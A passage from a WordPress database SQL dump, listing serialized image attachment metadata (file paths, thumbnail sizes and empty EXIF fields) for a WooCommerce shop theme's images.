h8-novo-1100x458.png\";s:5:\"width\";i:1100;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h8-novo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"h8-novo-600x205.png\";s:5:\"width\";i:600;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-novo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1161,1574,'_wp_attached_file','2018/01/h7-img-16.jpg'),(1162,1574,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:401;s:4:\"file\";s:21:\"2018/01/h7-img-16.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-16-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-16-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h7-img-16-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h7-img-16-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1163,245,'_wp_attachment_image_alt','a'),(1164,246,'_wp_attached_file','2018/01/h1-img-16.jpg'),(1165,246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:21:\"2018/01/h1-img-16.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-img-16-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h1-img-16-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h1-img-16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h1-img-16-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h1-img-16-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h1-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1166,1574,'_wp_attachment_image_alt','s'),(1167,1576,'_wp_attached_file','2018/01/h7-img-17.jpg'),(1168,1576,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:346;s:6:\"height\";i:232;s:4:\"file\";s:21:\"2018/01/h7-img-17.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-17-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-17-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-17-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-17-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1169,1211,'_wp_attachment_image_alt','o'),(1170,3551,'_wp_attachment_image_alt','a'),(1171,1576,'_wp_attachment_image_alt','k'),(1172,3556,'_wp_attachment_image_alt',''),(1173,3562,'_wp_attachment_image_alt','o'),(1174,246,'_wp_attachment_image_alt','a'),(1175,1216,'_wp_attached_file','2018/01/h9-img-9.jpg'),(1176,1216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:483;s:6:\"height\";i:318;s:4:\"file\";s:20:\"2018/01/h9-img-9.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h9-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h9-img-9-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h9-img-9-483x300.jpg\";s:5:\"width\";i:483;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h9-img-9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h9-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1177,1578,'_wp_attached_file','2018/01/h7-img-18.jpg'),(1178,1578,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:401;s:4:\"file\";s:21:\"2018/01/h7-img-18.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-18-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-18-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-18-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-18-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h7-img-18-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h7-img-18-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-18-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1179,3565,'_wp_attached_file','2018/02/landing-cimet-img-2.png'),(1180,3565,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:290;s:4:\"file\";s:31:\"2018/02/landing-cimet-img-2.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-cimet-img-2-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-2-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-cimet-img-2-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1181,261,'_wp_attached_file','2018/01/signature-contact.png'),(1182,261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:103;s:6:\"height\";i:58;s:4:\"file\";s:29:\"2018/01/signature-contact.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"signature-contact-100x58.png\";s:5:\"width\";i:100;s:6:\"height\";i:58;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"signature-contact-100x58.png\";s:5:\"width\";i:100;s:6:\"height\";i:58;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1183,941,'_wp_attachment_image_alt','o'),(1184,261,'_wp_attachment_image_alt','o'),(1185,1216,'_wp_attachment_image_alt','o'),(1186,942,'_wp_attached_file','2018/01/h8-slide1-graphic4.png'),(1187,942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:307;s:6:\"height\";i:326;s:4:\"file\";s:30:\"2018/01/h8-slide1-graphic4.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h8-slide1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-307x300.png\";s:5:\"width\";i:307;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h8-slide1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1188,289,'_wp_attached_file','2018/01/pricing-img-1.jpg'),(1189,289,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1052;s:4:\"file\";s:25:\"2018/01/pricing-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"pricing-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-600x329.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:329;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"pricing-img-1-1024x561.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-768x421.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:421;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"pricing-img-1-1536x842.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:842;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"pricing-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"pricing-img-1-550x1052.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1052;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"pricing-img-1-1100x1052.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1052;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"pricing-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-600x329.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:329;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1190,1277,'_wp_attached_file','2018/01/h9-img-4.jpg'),(1191,1277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:958;s:6:\"height\";i:1104;s:4:\"file\";s:20:\"2018/01/h9-img-4.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h9-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h9-img-4-600x691.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:691;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h9-img-4-260x300.jpg\";s:5:\"width\";i:260;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h9-img-4-889x1024.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h9-img-4-768x885.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:885;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h9-img-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h9-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h9-img-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h9-img-4-958x550.jpg\";s:5:\"width\";i:958;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h9-img-4-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h9-img-4-958x1100.jpg\";s:5:\"width\";i:958;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h9-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h9-img-4-600x691.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:691;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";